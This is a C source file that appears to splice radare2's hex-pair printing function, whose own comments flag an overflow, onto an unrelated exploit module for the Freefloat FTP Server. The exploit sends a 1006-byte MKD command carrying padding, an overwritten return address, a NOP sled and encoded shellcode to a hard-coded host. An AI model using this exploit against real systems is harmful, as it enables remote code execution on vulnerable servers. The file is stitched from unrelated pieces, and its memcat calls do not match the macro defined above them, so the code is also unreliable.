// XXX: redesign ? :) R_API char *r_print_hexpair(RPrint *p, const char *str, int n) { const char *s, *lastcol = Color_WHITE; char *d, *dst = (char *)malloc ((strlen (str)+2)*32); int colors = p->flags & R_PRINT_FLAGS_COLOR; /* XXX That's hacky as shit.. but partially works O:) */ /* TODO: Use r_print_set_cursor for win support */ int cur = R_MIN (p->cur, p->ocur); int ocur = R_MAX (p->cur, p->ocur); int ch, i; if (p->cur_enabled && cur==-1) cur = ocur; ocur++; #if CURDBG sprintf (dst, "(%d/%d/%d/%d)", p->cur_enabled, cur, ocur, n); d = dst+ strlen(dst); #else d = dst; #endif // XXX: overflow here // TODO: Use r_cons primitives here #define memcat(x,y) { memcpy(x,y,strlen(y));x+=strlen(y); } //for (s=str, d=dst; *s; s+=2, d+=2, i++) { for (s=str, i=0 ; *s; s+=2, d+=2, i++) { if (p->cur_enabled) { if (i==ocur-n) //memcat (d, "\x1b[27;47;30m"); //memcat (d, "\x1b[0m");//27;47;30m"); memcat (d, "\x1b[0m"); memcat (d, lastcol); if (i>=cur-n && i<ocur-n) memcat (d, "\x1b[7m"); } if (colors) { if (s[0]=='0' && s[1]=='0') lastcol = Color_GREEN; else if (s[0]=='7' && s[1]=='f') lastcol = Color_YELLOW; else if (s[0]=='f' && s[1]=='f') lastcol = Color_RED; else { ch = r_hex_pair2bin(s); //sscanf (s, "%02x", &ch); // XXX can be optimized if (IS_PRINTABLE (ch)) lastcol = Color_MAGENTA; } memcat (d, lastcol); } memcpy (d, s, 2); } if (colors || p->cur_enabled) memcpy (d, Color_RESET, strlen (Color_RESET)+1); else *d = 0; return dst; }
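/* Freefloat FTP Server - stack buffer overflow in the MKD command.
 *
 * Logs in with throw-away credentials and sends a 1006-byte MKD line laid
 * out as:
 *
 *   "MKD " | 247 x 'A' | return address | NOP sled | payload | "\r\n"
 *
 * module - module descriptor; only module->target.offset is read, and only
 *          for a diagnostic print. The 247-byte padding, the target host/port
 *          and the return address are still hard-coded (see the TODO below).
 *
 * Returns NULL in every case. On a failed connect or allocation an error is
 * printed and nothing is sent. The socket is intentionally not closed here,
 * matching the original behaviour (no close helper is in view).
 *
 * NOTE(review): "\xEF\x31\x9D\x7C" is a raw little-endian pointer into the
 * target process; it is only valid for the build it was taken from.
 */
void *freefloat_ftp_server_mkd_exploit(struct module_t *module)
{
	enum {
		ATTACK_LEN = 1006,	/* total length of the MKD line */
		JUNK_LEN = 247,		/* padding up to the saved return address */
		RET_LEN = 4,		/* width of the overwritten return address */
		VERB_LEN = 4,		/* "MKD " */
		CRLF_LEN = 2,		/* "\r\n" */
		RECV_LEN = 1024		/* scratch buffer for server replies */
	};
	/* Encoded payload. It contains no 0x00 byte, so sizeof - 1 equals the
	 * strlen() the original used; sizeof stays correct if a payload with
	 * embedded NULs is ever substituted. */
	static const char sc[] =
		"\xba\x46\x14\xf5\x8a\xda\xc8\xd9\x74\x24\xf4\x5e\x2b\xc9"
		"\xb1\x33\x83\xee\xfc\x31\x56\x0e\x03\x10\x1a\x17\x7f\x60"
		"\xca\x5e\x80\x98\x0b\x01\x08\x7d\x3a\x13\x6e\xf6\x6f\xa3"
		"\xe4\x5a\x9c\x48\xa8\x4e\x17\x3c\x65\x61\x90\x8b\x53\x4c"
		"\x21\x3a\x5c\x02\xe1\x5c\x20\x58\x36\xbf\x19\x93\x4b\xbe"
		"\x5e\xc9\xa4\x92\x37\x86\x17\x03\x33\xda\xab\x22\x93\x51"
		"\x93\x5c\x96\xa5\x60\xd7\x99\xf5\xd9\x6c\xd1\xed\x52\x2a"
		"\xc2\x0c\xb6\x28\x3e\x47\xb3\x9b\xb4\x56\x15\xd2\x35\x69"
		"\x59\xb9\x0b\x46\x54\xc3\x4c\x60\x87\xb6\xa6\x93\x3a\xc1"
		"\x7c\xee\xe0\x44\x61\x48\x62\xfe\x41\x69\xa7\x99\x02\x65"
		"\x0c\xed\x4d\x69\x93\x22\xe6\x95\x18\xc5\x29\x1c\x5a\xe2"
		"\xed\x45\x38\x8b\xb4\x23\xef\xb4\xa7\x8b\x50\x11\xa3\x39"
		"\x84\x23\xee\x57\x5b\xa1\x94\x1e\x5b\xb9\x96\x30\x34\x88"
		"\x1d\xdf\x43\x15\xf4\xa4\xbc\x5f\x55\x8c\x54\x06\x0f\x8d"
		"\x38\xb9\xe5\xd1\x44\x3a\x0c\xa9\xb2\x22\x65\xac\xff\xe4"
		"\x95\xdc\x90\x80\x99\x73\x90\x80\xf9\x12\x02\x48\xd0\xb1"
		"\xa2\xeb\x2c";
	static const char user_cmd[] = "USER wtf\r\n";
	static const char pass_cmd[] = "PASS wtf\r\n";
	const size_t sc_len = sizeof sc - 1;
	struct module_t *self = module;
	char buffer[RECV_LEN];
	char attack_string[ATTACK_LEN];
	char *junk = NULL;
	char *nops = NULL;
	int sock_fd;
	int offset = 0;
	int space;

	if (!self) {
		return NULL;
	}
	print_error("self.offset = %d", self->target.offset);

	/* Total size - verb - padding - address - payload - CRLF. */
	space = ATTACK_LEN - VERB_LEN - JUNK_LEN - RET_LEN - (int) sc_len - CRLF_LEN;
	if (space < 0) {
		print_error("payload does not fit in the MKD buffer");
		return NULL;
	}

	junk = make_buff('A', JUNK_LEN);
	nops = make_buff('\x90', space);
	if (!junk || !nops) {
		print_error("make_buff failed");
		goto out;
	}

	/* Build the line before touching the network so a failure here sends
	 * nothing. Every byte of attack_string is overwritten by the memcat
	 * sequence; the memset only guarantees a defined fill. */
	memset(attack_string, '\x90', sizeof attack_string);
	memcat(attack_string, ATTACK_LEN, &offset, "MKD ", VERB_LEN);
	memcat(attack_string, ATTACK_LEN, &offset, junk, JUNK_LEN);
	/* Overwrites the saved return address with 0x7C9D31EF (little-endian). */
	memcat(attack_string, ATTACK_LEN, &offset, "\xEF\x31\x9D\x7C", RET_LEN);
	memcat(attack_string, ATTACK_LEN, &offset, nops, space);
	memcat(attack_string, ATTACK_LEN, &offset, sc, sc_len);
	memcat(attack_string, ATTACK_LEN, &offset, "\r\n", CRLF_LEN);

	memset(buffer, 0, sizeof buffer);
	/* Hard coded until i get a good options method setup */
	sock_fd = tcp_socket_connect("10.69.69.208", "21", buffer, sizeof buffer);
	/* Assumes a negative return signals a failed connect - TODO confirm
	 * against tcp_socket_connect. */
	if (sock_fd < 0) {
		print_error("connect to target failed");
		goto out;
	}

	/* Send the commands without their NUL terminator: the original passed
	 * 11 for these 10-byte strings and shipped the NUL to the server. */
	tcp_send_recv(sock_fd, user_cmd, sizeof user_cmd - 1, buffer, sizeof buffer);
	tcp_send_recv(sock_fd, pass_cmd, sizeof pass_cmd - 1, buffer, sizeof buffer);
	tcp_send_recv(sock_fd, attack_string, ATTACK_LEN, buffer, sizeof buffer);

out:
	free(junk);
	free(nops);
	return NULL;
}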